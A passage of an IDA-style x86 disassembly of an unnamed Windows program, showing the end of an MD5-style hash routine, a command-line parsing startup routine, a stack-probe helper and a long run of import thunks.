[edi+4] mov [edi], eax mov ebx, [edi] mov ecx, [edi+4] mov edx, [edi+8] call sub_406FB5 add eax, [edi+0Ch] add eax, [esi+28h] add eax, 2441453h rol eax, 9 add eax, [edi] mov [edi+0Ch], eax mov ebx, [edi+0Ch] mov ecx, [edi] mov edx, [edi+4] call sub_406FB5 add eax, [edi+8] add eax, [esi+3Ch] add eax, 0D8A1E681h rol eax, 0Eh add eax, [edi+0Ch] mov [edi+8], eax mov ebx, [edi+8] mov ecx, [edi+0Ch] mov edx, [edi] call sub_406FB5 add eax, [edi+4] add eax, [esi+10h] add eax, 0E7D3FBC8h rol eax, 14h add eax, [edi+8] mov [edi+4], eax mov ebx, [edi+4] mov ecx, [edi+8] mov edx, [edi+0Ch] call sub_406FB5 add eax, [edi] add eax, [esi+24h] add eax, 21E1CDE6h rol eax, 5 add eax, [edi+4] mov [edi], eax mov ebx, [edi] mov ecx, [edi+4] mov edx, [edi+8] call sub_406FB5 add eax, [edi+0Ch] add eax, [esi+38h] add eax, 0C33707D6h rol eax, 9 add eax, [edi] mov [edi+0Ch], eax mov ebx, [edi+0Ch] mov ecx, [edi] mov edx, [edi+4] call sub_406FB5 add eax, [edi+8] add eax, [esi+0Ch] add eax, 0F4D50D87h rol eax, 0Eh add eax, [edi+0Ch] mov [edi+8], eax mov ebx, [edi+8] mov ecx, [edi+0Ch] mov edx, [edi] call sub_406FB5 add eax, [edi+4] add eax, [esi+20h] add eax, 455A14EDh rol eax, 14h add eax, [edi+8] mov [edi+4], eax mov ebx, [edi+4] mov ecx, [edi+8] mov edx, [edi+0Ch] call sub_406FB5 add eax, [edi] add eax, [esi+34h] add eax, 0A9E3E905h rol eax, 5 add eax, [edi+4] mov [edi], eax mov ebx, [edi] mov ecx, [edi+4] mov edx, [edi+8] call sub_406FB5 add eax, [edi+0Ch] add eax, [esi+8] add eax, 0FCEFA3F8h rol eax, 9 add eax, [edi] mov [edi+0Ch], eax mov ebx, [edi+0Ch] mov ecx, [edi] mov edx, [edi+4] call sub_406FB5 add eax, [edi+8] add eax, [esi+1Ch] add eax, 676F02D9h rol eax, 0Eh add eax, [edi+0Ch] mov [edi+8], eax mov ebx, [edi+8] mov ecx, [edi+0Ch] mov edx, [edi] call sub_406FB5 add eax, [edi+4] add eax, [esi+30h] add eax, 8D2A4C8Ah rol eax, 14h add eax, [edi+8] mov [edi+4], eax mov ebx, [edi+4] mov ecx, [edi+8] mov edx, [edi+0Ch] call sub_406FC2 add eax, [edi] add eax, [esi+14h] add eax, 0FFFA3942h rol eax, 4 add eax, [edi+4] mov [edi], eax mov ebx, [edi] mov ecx, [edi+4] mov edx, [edi+8] call sub_406FC2 add eax, [edi+0Ch] add eax, [esi+20h] add eax, 8771F681h rol eax, 0Bh add eax, [edi] mov [edi+0Ch], eax mov ebx, [edi+0Ch] mov ecx, [edi] mov edx, [edi+4] call sub_406FC2 add eax, [edi+8] add eax, [esi+2Ch] add eax, 6D9D6122h rol eax, 10h add eax, [edi+0Ch] mov [edi+8], eax mov ebx, [edi+8] mov ecx, [edi+0Ch] mov edx, [edi] call sub_406FC2 add eax, [edi+4] add eax, [esi+38h] add eax, 0FDE5380Ch rol eax, 17h add eax, [edi+8] mov [edi+4], eax mov ebx, [edi+4] mov ecx, [edi+8] mov edx, [edi+0Ch] call sub_406FC2 add eax, [edi] add eax, [esi+4] add eax, 0A4BEEA44h rol eax, 4 add eax, [edi+4] mov [edi], eax mov ebx, [edi] mov ecx, [edi+4] mov edx, [edi+8] call sub_406FC2 add eax, [edi+0Ch] add eax, [esi+10h] add eax, 4BDECFA9h rol eax, 0Bh add eax, [edi] mov [edi+0Ch], eax mov ebx, [edi+0Ch] mov ecx, [edi] mov edx, [edi+4] call sub_406FC2 add eax, [edi+8] add eax, [esi+1Ch] add eax, 0F6BB4B60h rol eax, 10h add eax, [edi+0Ch] mov [edi+8], eax mov ebx, [edi+8] mov ecx, [edi+0Ch] mov edx, [edi] call sub_406FC2 add eax, [edi+4] add eax, [esi+28h] add eax, 0BEBFBC70h rol eax, 17h add eax, [edi+8] mov [edi+4], eax mov ebx, [edi+4] mov ecx, [edi+8] mov edx, [edi+0Ch] call sub_406FC2 add eax, [edi] add eax, [esi+34h] add eax, 289B7EC6h rol eax, 4 add eax, [edi+4] mov [edi], eax mov ebx, [edi] mov ecx, [edi+4] mov edx, [edi+8] call sub_406FC2 add eax, [edi+0Ch] add eax, [esi] add eax, 0EAA127FAh rol eax, 0Bh add eax, [edi] mov [edi+0Ch], eax mov ebx, [edi+0Ch] mov ecx, [edi] mov edx, [edi+4] call sub_406FC2 add eax, [edi+8] add eax, [esi+0Ch] add eax, 0D4EF3085h rol eax, 10h add eax, [edi+0Ch] mov [edi+8], eax mov ebx, [edi+8] mov ecx, [edi+0Ch] mov edx, [edi] call sub_406FC2 add eax, [edi+4] add eax, [esi+18h] add eax, 4881D05h rol eax, 17h add eax, [edi+8] mov [edi+4], eax mov ebx, [edi+4] mov ecx, [edi+8] mov edx, [edi+0Ch] call sub_406FC2 add eax, [edi] add eax, [esi+24h] add eax, 0D9D4D039h rol eax, 4 add eax, [edi+4] mov [edi], eax mov ebx, [edi] mov ecx, [edi+4] mov edx, [edi+8] call sub_406FC2 add eax, [edi+0Ch] add eax, [esi+30h] add eax, 0E6DB99E5h rol eax, 0Bh add eax, [edi] mov [edi+0Ch], eax mov ebx, [edi+0Ch] mov ecx, [edi] mov edx, [edi+4] call sub_406FC2 add eax, [edi+8] add eax, [esi+3Ch] add eax, 1FA27CF8h rol eax, 10h add eax, [edi+0Ch] mov [edi+8], eax mov ebx, [edi+8] mov ecx, [edi+0Ch] mov edx, [edi] call sub_406FC2 add eax, [edi+4] add eax, [esi+8] add eax, 0C4AC5665h rol eax, 17h add eax, [edi+8] mov [edi+4], eax mov ebx, [edi+4] mov ecx, [edi+8] mov edx, [edi+0Ch] call sub_406FC9 add eax, [edi] add eax, [esi] add eax, 0F4292244h rol eax, 6 add eax, [edi+4] mov [edi], eax mov ebx, [edi] mov ecx, [edi+4] mov edx, [edi+8] call sub_406FC9 add eax, [edi+0Ch] add eax, [esi+1Ch] add eax, 432AFF97h rol eax, 0Ah add eax, [edi] mov [edi+0Ch], eax mov ebx, [edi+0Ch] mov ecx, [edi] mov edx, [edi+4] call sub_406FC9 add eax, [edi+8] add eax, [esi+38h] add eax, 0AB9423A7h rol eax, 0Fh add eax, [edi+0Ch] mov [edi+8], eax mov ebx, [edi+8] mov ecx, [edi+0Ch] mov edx, [edi] call sub_406FC9 add eax, [edi+4] add eax, [esi+14h] add eax, 0FC93A039h rol eax, 15h add eax, [edi+8] mov [edi+4], eax mov ebx, [edi+4] mov ecx, [edi+8] mov edx, [edi+0Ch] call sub_406FC9 add eax, [edi] add eax, [esi+30h] add eax, 655B59C3h rol eax, 6 add eax, [edi+4] mov [edi], eax mov ebx, [edi] mov ecx, [edi+4] mov edx, [edi+8] call sub_406FC9 add eax, [edi+0Ch] add eax, [esi+0Ch] add eax, 8F0CCC92h rol eax, 0Ah add eax, [edi] mov [edi+0Ch], eax mov ebx, [edi+0Ch] mov ecx, [edi] mov edx, [edi+4] call sub_406FC9 add eax, [edi+8] add eax, [esi+28h] add eax, 0FFEFF47Dh rol eax, 0Fh add eax, [edi+0Ch] mov [edi+8], eax mov ebx, [edi+8] mov ecx, [edi+0Ch] mov edx, [edi] call sub_406FC9 add eax, [edi+4] add eax, [esi+4] add eax, 85845DD1h rol eax, 15h add eax, [edi+8] mov [edi+4], eax mov ebx, [edi+4] mov ecx, [edi+8] mov edx, [edi+0Ch] call sub_406FC9 add eax, [edi] add eax, [esi+20h] add eax, 6FA87E4Fh rol eax, 6 add eax, [edi+4] mov [edi], eax mov ebx, [edi] mov ecx, [edi+4] mov edx, [edi+8] call sub_406FC9 add eax, [edi+0Ch] add eax, [esi+3Ch] add eax, 0FE2CE6E0h rol eax, 0Ah add eax, [edi] mov [edi+0Ch], eax mov ebx, [edi+0Ch] mov ecx, [edi] mov edx, [edi+4] call sub_406FC9 add eax, [edi+8] add eax, [esi+18h] add eax, 0A3014314h rol eax, 0Fh add eax, [edi+0Ch] mov [edi+8], eax mov ebx, [edi+8] mov ecx, [edi+0Ch] mov edx, [edi] call sub_406FC9 add eax, [edi+4] add eax, [esi+34h] add eax, 4E0811A1h rol eax, 15h add eax, [edi+8] mov [edi+4], eax mov ebx, [edi+4] mov ecx, [edi+8] mov edx, [edi+0Ch] call sub_406FC9 add eax, [edi] add eax, [esi+10h] add eax, 0F7537E82h rol eax, 6 add eax, [edi+4] mov [edi], eax mov ebx, [edi] mov ecx, [edi+4] mov edx, [edi+8] call sub_406FC9 add eax, [edi+0Ch] add eax, [esi+2Ch] add eax, 0BD3AF235h rol eax, 0Ah add eax, [edi] mov [edi+0Ch], eax mov ebx, [edi+0Ch] mov ecx, [edi] mov edx, [edi+4] call sub_406FC9 add eax, [edi+8] add eax, [esi+8] add eax, 2AD7D2BBh rol eax, 0Fh add eax, [edi+0Ch] mov [edi+8], eax mov ebx, [edi+8] mov ecx, [edi+0Ch] mov edx, [edi] call sub_406FC9 add eax, [edi+4] add eax, [esi+24h] add eax, 0EB86D391h rol eax, 15h add eax, [edi+8] mov [edi+4], eax mov eax, dword_425488 add [edi], eax mov eax, dword_42548C add [edi+4], eax mov eax, dword_425490 add [edi+8], eax mov eax, dword_425494 add [edi+0Ch], eax popa pop ebp xor eax, eax retn 8 sub_406FF9 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_407844 proc near ; CODE XREF: sub_405AAC+79Ap var_1C = dword ptr -1Ch var_4 = word ptr -4 var_2 = word ptr -2 push ebp mov ebp, esp sub esp, 1Ch fnstcw [ebp+var_2] mov ax, [ebp+var_2] or ah, 0Ch mov [ebp+var_4], ax fldcw [ebp+var_4] fistp [esp+1Ch+var_1C] mov eax, [esp+1Ch+var_1C] fldcw [ebp+var_2] leave retn sub_407844 endp ; --------------------------------------------------------------------------- align 4 ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_407868 proc near ; CODE XREF: sub_401219+66p var_4 = dword ptr -4 push ebp mov ebp, esp push ecx push edi call sub_407930 ; GetCommandLineA mov edi, eax cmp byte ptr [edi], 22h jnz short loc_40789C push 22h mov eax, edi inc eax push eax call sub_407E70 add esp, 8 mov [ebp+var_4], eax or eax, eax jz short loc_4078B7 mov edi, eax inc edi jmp short loc_407894 ; --------------------------------------------------------------------------- loc_407893: ; CODE XREF: sub_407868+2Fj inc edi loc_407894: ; CODE XREF: sub_407868+29j cmp byte ptr [edi], 20h jz short loc_407893 jmp short loc_4078B7 ; --------------------------------------------------------------------------- loc_40789B: ; CODE XREF: sub_407868+3Ej inc edi loc_40789C: ; CODE XREF: sub_407868+Fj movsx eax, byte ptr [edi] or eax, eax jz short loc_4078A8 cmp eax, 20h jnz short loc_40789B loc_4078A8: ; CODE XREF: sub_407868+39j jmp short loc_4078AB ; --------------------------------------------------------------------------- loc_4078AA: ; CODE XREF: sub_407868+4Dj inc edi loc_4078AB: ; CODE XREF: sub_407868:loc_4078A8j movsx eax, byte ptr [edi] or eax, eax jz short loc_4078B7 cmp eax, 20h jz short loc_4078AA loc_4078B7: ; CODE XREF: sub_407868+24j ; sub_407868+31j ... push 0 call sub_407978 ; GetModuleHandleA push 1 push edi push 0 push eax call sub_406344 pop edi leave retn sub_407868 endp ; =============== S U B R O U T I N E ======================================= sub_4078CC proc near ; CODE XREF: sub_40129C+8p ; sub_401EAF+8p ... var_FFC = dword ptr -0FFCh pop ecx loc_4078CD: ; CODE XREF: sub_4078CC+14j sub esp, 1000h sub eax, 1000h test [esp+0FFCh+var_FFC], eax cmp eax, 1000h jnb short loc_4078CD sub esp, eax test [esp+0FFCh+var_FFC], eax jmp ecx sub_4078CC endp ; sp-analysis failed ; --------------------------------------------------------------------------- align 4 ; =============== S U B R O U T I N E ======================================= sub_4078EC proc near ; CODE XREF: sub_401565+75p ; sub_4034AD+1Dp ... arg_0 = dword ptr 4 arg_4 = dword ptr 8 mov edx, [esp+arg_4] xor eax, eax mov ecx, 0FFFFFFFFh xchg edi, edx repne scasb neg ecx lea ecx, [ecx-1] mov eax, [esp+arg_4] xchg eax, esi mov edi, [esp+arg_0] rep movsb xchg eax, esi xchg edx, edi mov eax, [esp+arg_0] retn 8 sub_4078EC endp ; --------------------------------------------------------------------------- align 4 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407918 proc near ; CODE XREF: sub_406344+1F1p jmp ds:dword_426368 sub_407918 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407924 proc near ; CODE XREF: sub_403D8E+9Cp jmp ds:dword_42636C sub_407924 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407930 proc near ; CODE XREF: sub_407868+5p jmp ds:dword_426370 sub_407930 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_40793C proc near ; CODE XREF: sub_401B3E:loc_401D6Ep ; sub_4033E8+6p ... jmp ds:dword_426374 sub_40793C endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407948 proc near ; CODE XREF: sub_402CB2+Fp jmp ds:dword_426378 sub_407948 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407954 proc near ; CODE XREF: sub_4014E2+3Cp ; sub_405AAC+3D3p jmp ds:dword_42637C sub_407954 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407960 proc near ; CODE XREF: sub_40519A+7Ap jmp ds:dword_426380 sub_407960 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_40796C proc near ; CODE XREF: sub_402784+89p ; sub_402B0D+1Ep ... jmp ds:dword_426384 sub_40796C endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407978 proc near ; CODE XREF: sub_4019A1+6p ; sub_401B3E+C3p ... jmp ds:dword_426388 sub_407978 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407984 proc near ; CODE XREF: sub_40129C+4Fp ; sub_4014E2+72p ... jmp ds:dword_42638C sub_407984 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407990 proc near ; CODE XREF: sub_4019A1+13p ; sub_4019A1+23p ... jmp ds:dword_426390 sub_407990 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_40799C proc near ; CODE XREF: sub_4026EE+1Dp ; sub_402B0D+4Ep ... jmp ds:dword_426394 sub_40799C endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_4079A8 proc near ; CODE XREF: sub_403659+A7p jmp ds:dword_426398 sub_4079A8 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_4079B4 proc near ; CODE XREF: sub_405AAC+10p ; sub_406344+9Ap jmp ds:dword_42639C sub_4079B4 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_4079C0 proc near ; CODE XREF: sub_401EAF+1Cp ; sub_403BC5+EEp ... jmp ds:dword_4263A0 sub_4079C0 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_4079CC proc near ; CODE XREF: sub_402B0D+34p ; sub_406344+86p jmp ds:dword_4263A4 sub_4079CC endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_4079D8 proc near ; CODE XREF: sub_4026EE+57p jmp ds:dword_4263A8 sub_4079D8 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_4079E4 proc near ; CODE XREF: sub_402B0D+A5p ; sub_405AAC+633p ... jmp ds:dword_4263AC sub_4079E4 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_4079F0 proc near ; CODE XREF: sub_4024E0+33p ; sub_402613+1Ep ... jmp ds:dword_4263B0 sub_4079F0 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_4079FC proc near ; CODE XREF: sub_40251A+54p ; .text:004026E4p jmp ds:dword_4263B4 sub_4079FC endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407A08 proc near ; CODE XREF: sub_40251A+34p ; .text:004026C4p jmp ds:dword_4263B8 sub_407A08 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407A14 proc near ; CODE XREF: sub_401EAF+18Ep jmp ds:dword_4263BC sub_407A14 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407A20 proc near ; CODE XREF: sub_403D8E+290p ; sub_406344+1A8p jmp ds:dword_4263C0 sub_407A20 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407A2C proc near ; CODE XREF: sub_403D8E+1Cp jmp ds:dword_4263C4 sub_407A2C endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407A38 proc near ; CODE XREF: sub_401EAF+164p jmp ds:dword_4263C8 sub_407A38 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407A44 proc near ; CODE XREF: sub_401EAF+3D6p jmp ds:dword_4263CC sub_407A44 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407A50 proc near ; CODE XREF: sub_401EAF+8Bp jmp ds:dword_4263D0 sub_407A50 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407A5C proc near ; CODE XREF: sub_4014E2+49p ; sub_4033E8+38p ... jmp ds:dword_4263D4 sub_407A5C endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407A68 proc near ; CODE XREF: sub_4033E8+61p ; sub_403659+4Dp ... jmp ds:dword_4263D8 sub_407A68 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407A74 proc near ; CODE XREF: sub_406316+11p jmp ds:dword_4263DC sub_407A74 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407A80 proc near ; CODE XREF: sub_4033E8+15p jmp ds:dword_4263E0 sub_407A80 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407A8C proc near ; CODE XREF: sub_40129C+23p ; sub_4014E2+1Dp ... jmp ds:dword_4263E4 sub_407A8C endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407A98 proc near ; CODE XREF: sub_40129C+49p ; sub_4014E2+6Cp jmp ds:dword_4263E8 sub_407A98 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407AA4 proc near ; CODE XREF: sub_40107A+13p jmp ds:dword_4263EC sub_407AA4 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407AB0 proc near ; CODE XREF: sub_401EAF+326p ; sub_405350:loc_405390p jmp ds:dword_4263F0 sub_407AB0 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407ABC proc near ; CODE XREF: sub_403459+31p ; sub_404FCE+182p ... jmp ds:dword_4263F4 sub_407ABC endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407AC8 proc near ; CODE XREF: sub_40519A+97p jmp ds:dword_4263F8 sub_407AC8 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407AD4 proc near ; CODE XREF: sub_406344+2F5p jmp ds:dword_4263FC sub_407AD4 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407AE0 proc near ; CODE XREF: sub_403D8E+20Fp ; sub_403D8E+232p jmp ds:dword_426400 sub_407AE0 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407AEC proc near ; CODE XREF: sub_40409C+61p jmp ds:dword_426404 sub_407AEC endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407AF8 proc near ; CODE XREF: sub_40530C+Fp jmp ds:dword_426408 sub_407AF8 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407B04 proc near ; CODE XREF: sub_405322+Dp jmp ds:dword_42640C sub_407B04 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407B10 proc near ; CODE XREF: sub_401EAF+346p jmp ds:dword_426410 sub_407B10 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407B1C proc near ; CODE XREF: sub_403D8E+1B3p jmp ds:dword_426414 sub_407B1C endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407B28 proc near ; CODE XREF: sub_404117+24p jmp ds:dword_426418 sub_407B28 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407B34 proc near ; CODE XREF: sub_402784+BEp ; sub_402B0D+19Bp ... jmp ds:dword_42641C sub_407B34 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407B40 proc near ; CODE XREF: sub_402784+70p ; sub_40284A+1E1p ... jmp ds:dword_426420 sub_407B40 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407B4C proc near ; CODE XREF: sub_401565+62p ; sub_4035B2+Dp ... jmp ds:dword_426424 sub_407B4C endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407B58 proc near ; CODE XREF: sub_404117+Dp jmp ds:dword_426428 sub_407B58 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407B64 proc near ; CODE XREF: sub_404F53+1Ep ; sub_406344+45Dp jmp ds:dword_42642C sub_407B64 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407B70 proc near ; CODE XREF: sub_402B0D+F5p ; sub_403D8E+2ADp ... jmp ds:dword_426430 sub_407B70 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407B7C proc near ; CODE XREF: sub_403D8E+244p ; sub_404211+63p ... jmp ds:dword_42643C sub_407B7C endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407B88 proc near ; CODE XREF: sub_40553F+3Dp ; sub_4068A8+99p ... jmp ds:dword_426440 sub_407B88 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407B94 proc near ; CODE XREF: sub_403D8E+1FFp jmp ds:dword_426444 sub_407B94 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407BA0 proc near ; CODE XREF: sub_4054DD+13p ; sub_4054DD+56p jmp ds:dword_426448 sub_407BA0 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407BAC proc near ; CODE XREF: sub_4054DD+2Fp jmp ds:dword_42644C sub_407BAC endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407BB8 proc near ; CODE XREF: sub_40553F+564p ; sub_4067EE+27p ... jmp ds:dword_426450 sub_407BB8 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407BC4 proc near ; CODE XREF: sub_4043B0+4Cp jmp ds:dword_426454 sub_407BC4 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407BD0 proc near ; CODE XREF: sub_406344+280p jmp ds:dword_426458 sub_407BD0 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407BDC proc near ; CODE XREF: sub_406344+28Fp jmp ds:dword_42645C sub_407BDC endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407BE8 proc near ; CODE XREF: sub_406344+477p jmp ds:dword_426460 sub_407BE8 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407BF4 proc near ; CODE XREF: sub_406344+2B8p jmp ds:dword_426464 sub_407BF4 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407C00 proc near ; CODE XREF: sub_4068A8+262p ; sub_4068A8+2C4p ... jmp ds:dword_426468 sub_407C00 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407C0C proc near ; CODE XREF: sub_406344+49Ap jmp ds:dword_42646C sub_407C0C endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407C18 proc near ; CODE XREF: sub_40553F+4D6p ; sub_40553F+4FAp ... jmp ds:dword_426470 sub_407C18 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407C24 proc near ; CODE XREF: sub_40553F+4EDp ; sub_40553F+511p ... jmp ds:dword_426474 sub_407C24 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407C30 proc near ; CODE XREF: sub_402CB2+3Ep jmp ds:dword_426478 sub_407C30 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407C3C proc near ; CODE XREF: sub_402CB2+56p jmp ds:dword_42647C sub_407C3C endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407C48 proc near ; CODE XREF: sub_402CB2+15p jmp ds:dword_426480 sub_407C48 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407C54 proc near ; CODE XREF: sub_406344+482p jmp ds:dword_426484 sub_407C54 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407C60 proc near ; CODE XREF: sub_406344+48Bp jmp ds:dword_426488 sub_407C60 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407C6C proc near ; CODE XREF: sub_40553F+13Ap ; sub_40553F+1DDp ... jmp ds:dword_42648C sub_407C6C endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407C78 proc near ; CODE XREF: sub_4032E2+3Ep ; sub_4032E2+8Ep ... jmp ds:dword_426490 sub_407C78 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407C84 proc near ; CODE XREF: sub_4068A8+15Bp jmp ds:dword_426494 sub_407C84 endp ; --------------------------------------------------------------------------- align 10h ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407C90 proc near ; CODE XREF: sub_40553F+30p ; sub_4068A8+578p jmp ds:dword_426498 sub_407C90 endp ; --------------------------------------------------------------------------- db 2 dup(90h) dd 0 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407C9C proc near ; CODE XREF: sub_40553F+7Fp ; sub_40553F+BBp ... jmp ds:dword_42649C sub_407C9C endp ; --------------------------------------------------------------------------- align 8 ; =============== S U B R O U T I N E ======================================= ; Attributes: thunk sub_407CA8 proc near ; CODE XREF: sub_4068A8+176p ; sub_4068A8+4E9p jmp ds:dword_4264A0 sub_407CA8 endp ; --------------------------------------------------------------------------- db 2 dup(90h) 